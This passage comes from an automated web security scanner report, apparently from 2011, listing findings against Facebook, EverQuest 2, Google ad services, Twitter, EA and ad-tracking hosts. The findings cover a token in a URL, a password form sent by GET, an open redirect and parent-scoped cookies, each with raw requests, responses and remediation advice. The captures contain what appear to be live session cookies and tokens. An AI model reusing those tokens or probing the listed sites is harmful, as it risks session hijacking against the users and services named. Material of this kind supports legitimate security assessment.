Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 345928


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<span class="passedStep">
<a href="/store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=HOSTING_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea">Select Application</a>
...[SNIP]...
<td class="OrderRowTD" align="left" valign="top">

<a href="/store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=CHECKOUT_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea&act=remove&oitem=0" onclick="return confirmRemove();" class="IconRemove">Remove </a>
...[SNIP]...
9.9. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=155079171186702&app_id=155079171186702&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df143a1bc3%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_GB&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df12abf4cdc%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12b30ed1c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d7959e18%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12b30ed1c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25479d134%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12b30ed1c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bfa62428%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12b30ed1c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://phuket.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.9.59
X-Cnection: close
Date: Fri, 24 Jun 2011 13:20:38 GMT
Content-Length: 60

Given URL is not permitted by the application configuration.
10. Password field submitted using GET method  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://everquest2.com
Path:   /free_to_play

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /free_to_play HTTP/1.1
Host: everquest2.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:14 GMT
Set-Cookie: locale=en; Domain=everquest2.com; Expires=Wed, 12-Jul-2079 16:44:20 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 26302

                       
                                                                                               <!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <META name="verify-v1" content="FAL4eTH1ff6uBoYCGOj7efgHT8x
...[SNIP]...
<div class="formarea">    <form id="preRegForm">
       <!--
       <div id="countryContainer">
...[SNIP]...
</label>
           <input type="password" name="stationPassword" id="stationPassword" class="textfield transparent validate[required,funcCall[mustContainANumber],length[6,15]]">
    <div class="clean">
...[SNIP]...
</label>
           <input type="password" name="stationConfirmPassword" id="stationConfirmPassword" class="textfield transparent validate[required,funcCall[validate2fields]]">
    <div class="clean">
...[SNIP]...
11. Open redirection  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The value of the adurl request parameter is used to perform an HTTP redirect. The payload http%3a//ad26a94a492587d18/a%3fhttp%3a//ad.doubleclick.net/click%3bh%3dv8/3b30/2/0/*/a%3b241822308%3b0-0%3b0%3b64413316%3b933-120/600%3b42361883/42379670/1%3b%3b~sscs%3d%3fhttp%3a//www.celebritycruises.com/specials/viewHTMLPromo.do%3fpagename%3dEuropePromotions%26cS%3dvanity%26vanity%3dEuropePromotion%26cid%3ddi_pgr_0601_dr11q2eu_1106_sky was submitted in the adurl parameter. This caused a redirection to the following URL:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

Request

GET /pagead/aclk?sa=L&ai=BfELNjo8ETsG2FKP7lQesrNm2AceTxJcC76KQhyXAjbcBkN-hARABGAEgwcvRHjgAUJeRzKP______wFgydbyhsij_BqgAbeJ--kDsgEVd3d3LnBodWtldC10cmF2ZWwuY29tugEKMTIweDYwMF9hc8gBCdoBHWh0dHA6Ly93d3cucGh1a2V0LXRyYXZlbC5jb20vuAIYyAKvtZQaqAMB0QPgy9uX8AkKYegD7AfoA7Mt6AOzAegDzSfoA0P1AwAAAMQ&num=1&client=ca-pub-4422256122899399&val=ChAwY2E0MmQ4MTM3MDAwMGIzEM-pue4EGgjtg8uujvUQZyABKAE&sig=AGiWqtztk8LXvH-0DC-TiBn8CX7Ajzkjeg&adurl=http%3a//ad26a94a492587d18/a%3fhttp%3a//ad.doubleclick.net/click%3bh%3dv8/3b30/2/0/*/a%3b241822308%3b0-0%3b0%3b64413316%3b933-120/600%3b42361883/42379670/1%3b%3b~sscs%3d%3fhttp%3a//www.celebritycruises.com/specials/viewHTMLPromo.do%3fpagename%3dEuropePromotions%26cS%3dvanity%26vanity%3dEuropePromotion%26cid%3ddi_pgr_0601_dr11q2eu_1106_sky HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4422256122899399&output=html&h=600&slotname=7706808172&w=120&lmt=1308899798&flash=10.3.181&url=http%3A%2F%2Fwww.phuket-travel.com%2F&dt=1308921743060&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308921743084&frm=4&adk=3252930215&ga_vid=643271157.1308921743&ga_sid=1308921743&ga_hid=1634133515&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&fu=0&ifi=1&dtd=43&xpc=ynyfOlPgfP&p=http%3A//www.phuket-travel.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=CoQCQmZFTE5qbzhFVHNHMkZLUDdsUWVzck5tMkFjZVR4SmNDNzZLUWh5WEFqYmNCa04taEFSQUJHQUVnd2N2UkhqZ0FVSmVSektQX19fX19fd0ZneWRieWhzaWpfQnFnQWJlSi0ta0RzZ0VWZDNkM0xuQm9kV3RsZEMxMGNtRjJaV3d1WTI5dHVnRUtNVEl3ZURZd01GOWhjOGdCQ2RvQkhXaDBkSEE2THk5M2QzY3VjR2gxYTJWMExYUnlZWFpsYkM1amIyMHZ1QUlZeUFLdnRaUWFxQU1CMFFQZ3k5dVg4QWtLWWVnRDdBZm9BN010NkFPekFlZ0R6U2ZvQTBQMUF3QUFBTVESEwj2_Mm30s6pAhUMO-UKHWAtgzoYASDq7I662qL18TNIAQ; expires=Sun, 24-Jul-2011 13:26:41 GMT; path=/pagead/conversion/1027523767/
Cache-Control: private
Location: http://ad26a94a492587d18/a?http://ad.doubleclick.net/click;h=v8/3b30/2/0/*/a;241822308;0-0;0;64413316;933-120/600;42361883/42379670/1;;~sscs=?http://www.celebritycruises.com/specials/viewHTMLPromo.do?pagename=EuropePromotions&cS=vanity&vanity=EuropePromotion&cid=di_pgr_0601_dr11q2eu_1106_sky
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:26:41 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block

12. Cookie scoped to parent domain  previous  next
There are 50 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

12.1. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?since_id=83986945579028480&include_entities=1&include_available_features=1&contributor_details=true&include_rts=true&user_id=15234657 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
X-Twitter-Polling: true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130796296639680752; k=173.193.214.243.1308571866345827; __utmz=43838368.1308923300.10.3.utmcsr=support.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/app/answers/detail/a_id/4394; __utma=43838368.1598605414.1305368954.1308913365.1308923300.10; __utmc=43838368; __utmb=43838368.1.10.1308923300; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzY5MDg2MWJhZjViMjAyZGY4MDc2MDk3ZmNlMmEy%250AYjM6B2lkIiU0YjQyNTEzMzMyYTE4ODU0YjQxYTk3Yjk2ZTM4OWU1ZCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoOcmV0dXJuX3RvIhpodHRwOi8vdHdpdHRlci5jb20vZWE6D2Ny%250AZWF0ZWRfYXRsKwiug%252BjBMAE%253D--fae0483a5842011ad9a0222333fac5dc436bfe1e

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:49:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1308923391-40028-23588
X-RateLimit-Limit: 1000
ETag: "863510bfd05f46bc05fb758008ea14f6"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Fri, 24 Jun 2011 13:49:51 GMT
X-RateLimit-Remaining: 994
X-Runtime: 0.05064
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114508b243d
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 543ba3d8776a2596391f065315b725309d146be2
X-RateLimit-Reset: 1308926900
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzY5MDg2MWJhZjViMjAyZGY4MDc2MDk3ZmNlMmEy%250AYjM6B2lkIiU0YjQyNTEzMzMyYTE4ODU0YjQxYTk3Yjk2ZTM4OWU1ZCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoOcmV0dXJuX3RvIhpodHRwOi8vdHdpdHRlci5jb20vZWE6D2Ny%250AZWF0ZWRfYXRsKwiug%252BjBMAE%253D--fae0483a5842011ad9a0222333fac5dc436bfe1e; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 4498
Connection: close

{"statuses":[],"packed_response_type":"statuses","available_features":{"tweet_stream_retweets_by_others":1,"dashboard_activity_listed":1,"phoenix_tweetbox_talon":1,"tweet_stream_favorites_polling":1,"
...[SNIP]...
12.2. http://api.twitter.com/1/urls/resolve.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/urls/resolve.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/urls/resolve.json?urls%5B%5D=http%3A%2F%2Fow.ly%2F5oKRS&urls%5B%5D=http%3A%2F%2Fow.ly%2F5oKy4&urls%5B%5D=http%3A%2F%2Fow.ly%2F5ofOD&urls%5B%5D=http%3A%2F%2Fow.ly%2F5ofnG&urls%5B%5D=http%3A%2F%2Fow.ly%2F5oflE&urls%5B%5D=http%3A%2F%2Fow.ly%2F5of3j&urls%5B%5D=http%3A%2F%2Fow.ly%2F5oeXg&urls%5B%5D=http%3A%2F%2Fow.ly%2F5oeNB&urls%5B%5D=http%3A%2F%2Fow.ly%2F5oa4Y&urls%5B%5D=http%3A%2F%2Fow.ly%2F5o5k9&urls%5B%5D=http%3A%2F%2Fow.ly%2F5o4YM&urls%5B%5D=http%3A%2F%2Fow.ly%2F5o4Jj&urls%5B%5D=http%3A%2F%2Fbit.ly%2Fl0x4zn HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130796296639680752; k=173.193.214.243.1308571866345827; __utmz=43838368.1308923300.10.3.utmcsr=support.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/app/answers/detail/a_id/4394; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1598605414.1305368954.1308913365.1308923300.10; __utmc=43838368; __utmb=43838368.2.10.1308923300; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzY5MDg2MWJhZjViMjAyZGY4MDc2MDk3ZmNlMmEy%250AYjM6B2lkIiU0YjQyNTEzMzMyYTE4ODU0YjQxYTk3Yjk2ZTM4OWU1ZCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoOcmV0dXJuX3RvIiRodHRwOi8vdHdpdHRlci5jb20vYXNrZWFz%250AdXBwb3J0Og9jcmVhdGVkX2F0bCsIroPowTAB--53c908b5ac5e9523bb449b7c77acdfe7d28a8eac

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:50:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1308923447-17753-60906
X-RateLimit-Limit: 1000
ETag: "62bd892d49144959eee88efaaacc609a"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Fri, 24 Jun 2011 13:50:47 GMT
X-RateLimit-Remaining: 955
X-Runtime: 0.01192
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114508b243d
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 4574163279f6bcccd0daeaf1111869debe1ca4fd
X-RateLimit-Reset: 1308926900
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzY5MDg2MWJhZjViMjAyZGY4MDc2MDk3ZmNlMmEy%250AYjM6B2lkIiU0YjQyNTEzMzMyYTE4ODU0YjQxYTk3Yjk2ZTM4OWU1ZCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoOcmV0dXJuX3RvIiRodHRwOi8vdHdpdHRlci5jb20vYXNrZWFz%250AdXBwb3J0Og9jcmVhdGVkX2F0bCsIroPowTAB--53c908b5ac5e9523bb449b7c77acdfe7d28a8eac; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 945
Connection: close

{"http:\/\/ow.ly\/5of3j":"http:\/\/support.ea.com\/","http:\/\/ow.ly\/5o4YM":"http:\/\/support.ea.com\/","http:\/\/ow.ly\/5oflE":"http:\/\/support.eamobile.com\/","http:\/\/ow.ly\/5o4Jj":"http:\/\/sup
...[SNIP]...
12.3. http://www.ea.com/dynajs/gus.jsx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ea.com
Path:   /dynajs/gus.jsx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dynajs/gus.jsx HTTP/1.1
Host: www.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 File Not Found
Date: Fri, 24 Jun 2011 13:43:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Set-Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; path=/; domain=.ea.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html

12.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:00 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-00_11394222771308922260; expires=Wed, 22-Jun-2016 13:31:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_11394222771308922260; expires=Fri, 24-Jun-2011 13:46:00 GMT; path=/; domain=c3metrics.com
Content-Length: 6651
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
12.5. http://a.netmng.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?aid=244&tax=par HTTP/1.1
Host: a.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5_ii=rTeHHM8FxVXlMQtFpDbXwORJ34l%2Fv1YYJAemg0C6NzdfuMmQ7WJ%2F5pF%2FuEjoxoP2hR6hCc9xW5BuJ1voxxjDzHeonAdyaBOQeyplESkXfnYj7LfR14NPm2L%2FC%2F7q13jF; evo5=csmq4atf04cxa%7Cyyg8%2BAquYajlyU38mbKfM6zzAAi91YoxCASmOO%2F6vslaz3Wz6SAb7WNSoJ42tqPjZBZm%2BwU7nz%2BqSaZkPum3%2BCcVtWs4kWprLiUT69hq%2BB7egueH9fmWFooawy%2FIlN07%2FywLbqigg1lXylCtaXnEdSXrSN%2BG6wl4qKM0pyjpXM7wDjjF%2FTnaw27LAO86PDR8rVQBsHkjHYPXkvQDaVu1cNDOjedkku9rP5M4aXEKwkdj4GS5v130Su5DukdLRdsllQxY%2B7lxFgDjvyHHxdnOJN0dE%2F4NbWDBdda3%2BTZ9xk2kRE4siiSl%2FES6mcPHsh5QYNe%2B3r%2BixhOSblhWvWuhng4yHSIxh%2FdseAuHpAB4bgzwOQgOQtu6mRAPuh3ZeeWE4ftB5QnNagzzBV6tjFj2Gx16lEDbzzYwMXeK3q5f6XdSiNsf7FIJww9fjsd4IIexvm8cX3okZybYL6im77R%2Fm6D%2Biy0lxPC8bFKQsAI777CENYtplCK92RelBIxTakV2KZ9zjQZSBLVArtq%2Bd3A8brImrUXwY47CZCPMyU3E7HGBv5tRNsvK5locqtXgvWrgSFbQU%2FS7P2yi6Tu5HqAksMuAf7uFBpCtKBX0SbhRUzjxprR%2Bdzt3S5q1OPrunUWDaTyE%2FfH2xdVd9zwp8epdDU3YBru1Z4Bpl9GYvlnLLFyLJgKqp%2F2hzCYMa%2BYiQ0ZuhV1QwKhaQNvGQTe6134KX2JdCP%2BuD8wI%2FlVlbm5EPzEufUaBJmtDn8HMCishvBcS

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:58 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Thu, 23 Jun 2011 02:10:58 GMT
Last-Modified: Thu, 23 Jun 2011 02:10:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=csmq4atf04cxa%7CcUXouB4rLUo4z%2FFKqv9TTqetSZc6URjOUkrEwZxL19iFoM3B6TaCLVGSPl4YcBy8M5VAiHvrOT0p0MJYOkmTpDIOg2x6eeiUsYim2C5zms%2BvrRLQn%2FoybFZANl57jMSeqLSZr0cDlofYcqgbyhV3RKv1yXyCctLJPQejPFuG%2FSTaq20qktFEGeqalakL5cpnxnT9tbUjhJLDFmel2Kl7C%2B5z4szEshst11JdDKJH9eq%2BoqpkDMROMNvFjfMDpfNItKW%2FvjCiL3RPcp47TxOLhJ1Q2YxLnIEZhyzUPf2LGOE6tEXu99zJEid0dKnMpG%2Bt9tIdB8UM95tAZHMW4LcN96ZflsymOkOyFv%2F1NsyGKFpkir%2Bjuwdzi7qcC%2FUA0hVVE9G7U9zUMou5%2Bbc2a66HREcxgoJ%2BDYN1%2Bhl0najue0Mcc2UFyncDi8SA02XiMCyX0QJt1ZGMqincsgjg4PvOacguI41%2FRN9FLR0lJOwU0vGk7GnXdTKda3JAzbk22zhYUV2US7JJuCxrTdVyzrTwrXTOQRiQNUhR79O7q641BJrqJ1WoKm3ej57gnXAZz6Ea6eF4VqJJZafHUjoVvCR4%2FzbKbaCZ6W6F2FV54q3JzisnJLOIeRfLB8wzZ2Yl%2Bvao5sI%2BQsCZtivHP%2BZMXU4rAiUKToqmTb9NqrSxuxywPEfo2vtC%2FlqOA09MEIfqXMW%2Bzo1PK9bgH7HezrWA467f7Y0maS7n%2FbXXPRcfp3kGW0ejb6ZBA%2B2%2F1ebBdFEbxJtE; expires=Sun, 25-Dec-2011 